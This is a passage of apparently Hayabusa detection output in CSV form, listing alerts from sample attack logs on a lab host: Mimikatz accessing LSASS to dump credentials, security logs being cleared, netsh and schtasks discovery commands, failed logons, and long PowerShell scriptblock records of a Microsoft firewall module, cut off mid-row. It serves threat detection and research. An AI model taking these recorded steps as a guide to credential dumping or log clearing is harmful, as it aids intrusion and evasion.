SHA1=D241DF7B9D2EC0B8194751CD5CE153E27CC40FA4,MD5=A3CB3B02A683275F7E0A0F8A9A5C9E07,SHA256=31EB1DE7E840A342FD468E558E5AB627BCB4C542A8FE01AEC4D5BA01D539A0FC,IMPHASH=DBDEA7B557F0E6B5D9E18ABE9CE5220A",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx +2021-10-21 20:40:43.120 +00:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: mimikatz.exe | LID: 0x2e6dea4 | PID: 5040 | PGUID: 7CF65FC7-D04B-6171-1303-000000001200 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx +2021-10-21 20:40:43.136 +00:00,FS03.offsec.lan,10,low,,Process Access,Src Process: C:\TOOLS\Mimikatzx64\mimikatz.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 2032 | Src PGUID: 7CF65FC7-D02C-6171-1203-000000001200 | Tgt PID: 512 | Tgt PGUID: 7CF65FC7-6649-6165-0B00-000000001200,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx +2021-10-21 20:40:43.136 +00:00,FS03.offsec.lan,10,medium,CredAccess,Rare GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/proc_access_win_rare_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx +2021-10-22 13:39:49.619 +00:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx +2021-10-22 13:39:50.927 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh advfirewall show allprofiles | Path: C:\Windows\System32\netsh.exe | PID: 0x1328 | User: admmig | LID: 0x1f4c65f,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx +2021-10-22 13:39:55.502 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh a show allprofiles | Path: C:\Windows\System32\netsh.exe | PID: 0x10c4 | User: admmig | LID: 0x1f4c65f,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx +2021-10-22 14:02:11.218 +00:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx +2021-10-22 14:02:11.902 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: schtasks /query /xml | Path: C:\Windows\System32\schtasks.exe | PID: 0xce0 | User: admmig | LID: 0x1f4c65f,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx +2021-10-22 14:02:15.177 +00:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x3198a75,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx +2021-10-23 21:50:11.666 +00:00,FS03.offsec.lan,4625,low,,Logon Failure - Unknown Reason,User: - | Type: 10 | Computer: - | IP Addr: 10.23.23.9 | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LogonFailure_UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-failed login with denied access due to account restriction.evtx +2021-10-23 21:51:57.212 +00:00,FS03.offsec.lan,4625,low,,Logon Failure - Unknown Reason,User: - | Type: 10 | Computer: - | IP Addr: 10.23.23.9 | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LogonFailure_UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-failed login with denied access due to account restriction.evtx +2021-10-25 07:23:05.426 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-NetFirewallProfile,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.457 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"@{ ModuleVersion = '2.0.0.0' FormatsToProcess = 'NetSecurity.formats.ps1xml' TypesToProcess = 'NetSecurity.types.ps1xml' NestedModules = @( ""Microsoft.Windows.Firewall.Commands.dll"", ""NetFirewallRule.cmdletDefinition.cdxml"", ""NetIPsecRule.cmdletDefinition.cdxml"", ""NetIPsecMainModeRule.cmdletDefinition.cdxml"", ""NetFirewallAddressFilter.cmdletDefinition.cdxml"", ""NetFirewallApplicationFilter.cmdletDefinition.cdxml"", ""NetFirewallInterfaceFilter.cmdletDefinition.cdxml"", ""NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml"", ""NetFirewallSecurityFilter.cmdletDefinition.cdxml"", ""NetFirewallPortFilter.cmdletDefinition.cdxml"", ""NetFirewallServiceFilter.cmdletDefinition.cdxml"", ""NetIPsecPhase1AuthSet.cmdletDefinition.cdxml"", ""NetIPsecPhase2AuthSet.cmdletDefinition.cdxml"", ""NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml"", ""NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml"", ""NetFirewallProfile.cmdletDefinition.cdxml"", ""NetIPsecPolicyChange.cmdletDefinition.cdxml"", ""NetIPsecDospSetting.cmdletDefinition.cdxml"", ""NetIPsecIdentity.cmdletDefinition.cdxml"", ""NetIPsecMainModeSA.cmdletDefinition.cdxml"", ""NetIPsecQuickModeSA.cmdletDefinition.cdxml"", ""NetFirewallSetting.cmdletDefinition.cdxml"", ""NetGPO.cmdletDefinition.cdxml"" ) GUID = '{4B26FF51-7AEE-4731-9CF7-508B82532CBF}' Author = 'Microsoft Corporation' CompanyName = 'Microsoft Corporation' PowerShellVersion = '3.0' ClrVersion = '4.0' Copyright = '© Microsoft Corporation. All rights reserved.' HelpInfoUri = ""http://go.microsoft.com/fwlink/?linkid=285764"" FunctionsToExport = @( ""Copy-NetFirewallRule"", ""Copy-NetIPsecMainModeCryptoSet"", ""Copy-NetIPsecMainModeRule"", ""Copy-NetIPsecPhase1AuthSet"", ""Copy-NetIPsecPhase2AuthSet"", ""Copy-NetIPsecQuickModeCryptoSet"", ""Copy-NetIPsecRule"", ""Disable-NetFirewallRule"", ""Disable-NetIPsecMainModeRule"", ""Disable-NetIPsecRule"", ""Enable-NetFirewallRule"", ""Enable-NetIPsecMainModeRule"", ""Enable-NetIPsecRule"", ""Get-NetFirewallAddressFilter"", ""Get-NetFirewallApplicationFilter"", ""Get-NetFirewallInterfaceFilter"", ""Get-NetFirewallInterfaceTypeFilter"", ""Get-NetFirewallPortFilter"", ""Get-NetFirewallProfile"", ""Get-NetFirewallRule"", ""Get-NetFirewallSecurityFilter"", ""Get-NetFirewallServiceFilter"", ""Get-NetFirewallSetting"", ""Get-NetIPsecDospSetting"", ""Get-NetIPsecMainModeCryptoSet"", ""Get-NetIPsecMainModeRule"", ""Get-NetIPsecMainModeSA"", ""Get-NetIPsecPhase1AuthSet"", ""Get-NetIPsecPhase2AuthSet"", ""Get-NetIPsecQuickModeCryptoSet"", ""Get-NetIPsecQuickModeSA"", ""Get-NetIPsecRule"", ""New-NetFirewallRule"", ""New-NetIPsecDospSetting"", ""New-NetIPsecMainModeCryptoSet"", ""New-NetIPsecMainModeRule"", ""New-NetIPsecPhase1AuthSet"", ""New-NetIPsecPhase2AuthSet"", ""New-NetIPsecQuickModeCryptoSet"", ""New-NetIPsecRule"", ""Open-NetGPO"", ""Remove-NetFirewallRule"", ""Remove-NetIPsecDospSetting"", ""Remove-NetIPsecMainModeCryptoSet"", ""Remove-NetIPsecMainModeRule"", ""Remove-NetIPsecMainModeSA"", ""Remove-NetIPsecPhase1AuthSet"", ""Remove-NetIPsecPhase2AuthSet"", ""Remove-NetIPsecQuickModeCryptoSet"", ""Remove-NetIPsecQuickModeSA"", ""Remove-NetIPsecRule"", ""Rename-NetFirewallRule"", ""Rename-NetIPsecMainModeCryptoSet"", ""Rename-NetIPsecMainModeRule"", ""Rename-NetIPsecPhase1AuthSet"", ""Rename-NetIPsecPhase2AuthSet"", ""Rename-NetIPsecQuickModeCryptoSet"", ""Rename-NetIPsecRule"", ""Save-NetGPO"", ""Find-NetIPsecRule"", ""Set-NetFirewallAddressFilter"", ""Set-NetFirewallApplicationFilter"", ""Set-NetFirewallInterfaceFilter"", ""Set-NetFirewallInterfaceTypeFilter"", ""Set-NetFirewallPortFilter"", ""Set-NetFirewallProfile"", ""Set-NetFirewallRule"", ""Set-NetFirewallSecurityFilter"", ""Set-NetFirewallServiceFilter"", ""Set-NetFirewallSetting"", ""Set-NetIPsecDospSetting"", ""Set-NetIPsecMainModeCryptoSet"", ""Set-NetIPsecMainModeRule"", ""Set-NetIPsecPhase1AuthSet"", ""Set-NetIPsecPhase2AuthSet"", ""Set-NetIPsecQuickModeCryptoSet"", ""Set-NetIPsecRule"", ""Show-NetFirewallRule"", ""Show-NetIPsecRule"", ""Sync-NetIPsecRule"", ""Update-NetIPsecRule"" ) CmdletsToExport = @( ""Get-DAPolicyChange"", ""New-NetIPsecAuthProposal"", ""New-NetIPsecMainModeCryptoProposal"", ""New-NetIPsecQuickModeCryptoProposal"" ) AliasesToExport = @( ) }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.536 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallRule ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.536 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.536 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.582 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetFirewallRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Owner}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Program}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Package}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Service}, [Parameter(ParameterSetName='cim:CreateInstance0')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${LocalUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'I",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.582 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,n'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = 